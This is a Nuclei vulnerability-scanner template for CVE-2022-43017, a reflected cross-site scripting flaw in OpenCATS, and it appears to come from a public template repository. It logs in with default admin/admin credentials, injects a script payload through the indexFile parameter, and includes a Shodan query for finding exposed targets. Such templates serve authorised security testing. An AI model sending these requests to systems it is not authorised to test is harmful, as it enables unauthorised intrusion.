nuclei-templates/cves/2022/CVE-2022-43017.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-24 12:52:19 +00:00
id: CVE-2022-43017
info:
name: OpenCATS - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43017
2022-10-24 20:19:49 +00:00
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md
metadata:
verified: true
shodan-query: title:"OpenCATS"
tags: cve,cve2022,xss,opencats
2022-10-24 12:52:19 +00:00
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
- |
2022-10-24 20:19:49 +00:00
GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1
2022-10-24 12:52:19 +00:00
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
2022-10-24 20:19:49 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'CATS='
condition: and
2022-10-24 12:52:19 +00:00
- type: word
2022-10-24 20:19:49 +00:00
part: header
2022-10-24 12:52:19 +00:00
words:
2022-10-24 20:19:49 +00:00
- "text/html"
- type: status
status:
- 200